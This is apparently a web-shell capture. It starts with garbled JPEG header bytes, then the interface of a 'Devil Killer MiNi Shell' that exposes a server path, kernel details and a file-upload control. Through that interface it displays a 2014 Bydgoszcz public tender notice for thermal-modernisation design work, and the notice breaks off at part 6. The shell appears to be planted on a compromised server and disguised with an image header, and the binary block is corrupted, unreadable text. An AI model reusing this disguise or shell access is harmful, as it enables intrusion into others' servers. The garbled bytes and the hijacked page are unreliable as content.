JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140807/263758-N-2014.html

<p class="kh_header"><b>Bydgoszcz: 81/P/2014</b><br>
<b>Numer ogłoszenia: 263758 - 2014; data zamieszczenia: 07.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego-pełnomocnik Zamawiającego Miasta Bydgoszcz.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 81/P/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla nieruchomości przy   ul. Nowej 8, Szubińskiej 55, Pięknej 27, Ugory 18, Żeglarskiej 69 I i II, Łokietka 32, Gdańskiej 37, Piotra Skargi 10 (oficyna), Grunwaldzkiej 49 i Gdańskiej 130 (oficyna - 2) zarządzanych przez Administrację Domów Miejskich ADM Sp. z o.o. w Bydgoszczy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże,             iż w okresie  ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował należycie zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia tj.  WYKONAŁ  co najmniej: 
warunek dla wszystkich zadań :
-  2  (słownie: dwa)  projekty  budowlane  dotyczące  remontu  obiektu budowlanego,  znajdującego się w strefie ochrony zabytków lub wpisanego do rejestru zabytków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum :
warunek dla wszystkich zadań :
- osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno- budowlanej  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2013r., poz. 1409 ze zm.) lub odpowiadające im  uprawnienia budowlane, wydane na podstawie  wcześniej  obowiązujących przepisów prawa.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca w wykazie USŁUG ma wskazać tylko zamówienia polegające na wykonaniu projektu budowlanego  obejmującego  remont  obiektu budowlanego, znajdującego się w strefie ochrony 	zabytków lub wpisanego do rejestru zabytków;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  w  przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach  innych  podmiotów zgodnie z art.26 ust.2b ustawy pzp  -  pisemne  zobowiązanie  innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia  (w oryginale)
2.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo  o którym mowa  w  pkt.7.8. ust.1) niniejszej SIWZ (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii)
3. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii)
4. Formularz oferty - według wzoru stanowiącego załącznik nr 1/1 lub 1/2 do SIWZ (odpowiednio do zadania)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja  Domów Miejskich ADM Sp. z o.o. 
Dział  Zamówień Publicznych  
85-005 Bydgoszcz  ul. Gdańska 9   (2 piętro, pokój 2 ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2014 godzina 11:00, miejsce: Administracja  Domów Miejskich ADM Sp. z o.o. 
Dział  Zamówień Publicznych  
85-005 Bydgoszcz  ul. Gdańska 9   (2 piętro, pokój 2 ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 1: opracowanie dokumentacji projektowo-kosztorysowej na wykonanie termomodernizacji budynku frontowego i dwóch oficyn z uwzględnieniem wymiany stolarki okiennej i drzwiowej oraz remontem klatek schodowych w budynkach przy ul. Nowa 8,  Nowa- Oficyna 1,  Nowa 8 - Oficyna 2
Zakres  zamówienia  obejmuje:
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie charakterystyki energetycznej budynków
3)  opracowanie ekspertyzy ornitologicznej
4)  opracowanie ekspertyzy chiropterologicznej
5) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji z Miejskim Konserwatorem Zabytków oraz uzyskanie opinii MKZ i Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
6) wykonanie dokumentacji (projektu budowlanego termomodernizacji) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi, w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) -                w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarz oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta CD/DVD, 1 szt., kosztorys podzielić na części: docieplenie budynku frontowego, docieplenie oficyny nr 1, docieplenie             oficyny nr 2,  wymiana stolarki okiennej i drzwiowej (front, OF1, OF2),  remont klatek schodowych (front, OF1, OF2).
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD 1 szt.,z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - opracowanie dokumentacji projektowo-kosztorysowej na wykonanie termomodernizacji budynku przy ul. Szubińskiej 55 z uwzględnieniem wymiany stolarki okiennej i drzwiowej oraz               remontem klatki schodowej.
Zakres  zamówienia  obejmuje:
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie charakterystyki energetycznej budynku
3)  opracowanie ekspertyzy ornitologicznej
4)  opracowanie ekspertyzy chiropterologicznej
5) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji i uzyskanie opinii Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
6) wykonanie dokumentacji (projektu budowlanego termomodernizacji) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi, w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) -               w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta CD/DVD 1 szt., kosztorys należy podzielić na części: docieplenie ściany frontowej, docieplenie ściany od strony podwórza, wymiana stolarki otworowej, remont klatki schodowej. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD 1 szt.,z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 3:  opracowanie dokumentacji projektowo-kosztorysowej na wykonanie termomodernizacji budynku przy  ul. Pięknej 27  z uwzględnieniem wymiany stolarki okiennej i drzwiowej oraz remontem klatki schodowej (budynek znajduje się pod ochroną konserwatorską).
Zakres  zamówienia  obejmuje:
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie charakterystyki energetycznej budynku
3)  opracowanie ekspertyzy ornitologicznej
4)  opracowanie ekspertyzy chiropterologicznej
5) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji z Miejskim Konserwatorem Zabytków oraz uzyskanie opinii MKZ i Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
6) wykonanie dokumentacji (projektu budowlanego termomodernizacji) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi, w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) -                w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta CD/DVD, 1 egz., kosztorys należy podzielić na części: docieplenie ściany frontowej, docieplenie ściany od strony podwórza, wymiana stolarki otworowej, remont klatki schodowej. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: CD/DVD, 1 egz.,  z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej -  3 egzemplarze oraz  zapisana na nośniku elektronicznym: CD/DVD, 1 egz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 4: opracowanie dokumentacji projektowo-kosztorysowej na wykonanie termomodernizacji                                  budynku przy ul. Ugory 18  z uwzględnieniem wymiany otworowej  oraz remontem klatki schodowej (budynek znajduję się pod ochroną konserwatorską). 
Zakres  zamówienia  obejmuje : 
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie charakterystyki energetycznej budynku
3)  opracowanie ekspertyzy ornitologicznej
4)  opracowanie ekspertyzy chiropterologicznej
5) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji z Miejskim Konserwatorem Zabytków oraz uzyskanie opinii MKZ i Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
6) wykonanie dokumentacji (projektu budowlanego termomodernizacji) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi, w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) -                 w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i  zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym: CD/DVD, 1 egz. kosztorys należy podzielić na części: docieplenie ściany frontowej, docieplenie ściany od strony podwórza, wymiana stolarki otworowej, remont klatki schodowej. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: CD/DVD, 1 egz.,  z podziałem na części - jak kosztorys inwestorski).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 5: opracowanie dokumentacji projektowo-kosztorysowej na wykonanie remontu ściany szczytowej (docieplenia ściany wraz z kolorystyką, z demontażem istniejącego docieplenia) oraz wykonanie izolacji ściany fundamentowej wraz z opaską betonową budynku przy  ul. Łokietka 32
Zakres  zamówienia  obejmuje:
1)  opracowanie ekspertyzy ornitologicznej
2)  opracowanie ekspertyzy chiropterologicznej
3) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzyskanie opinii  Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
4) wykonanie dokumentacji (projektu budowlanego termomodernizacji) zgodnie z zaleceniami  ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi, w tym: wystąpienie              w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) - w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz.,
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta  CD/DVD, 1 egz.,
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej - 3  egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 81/P/2014.</p>
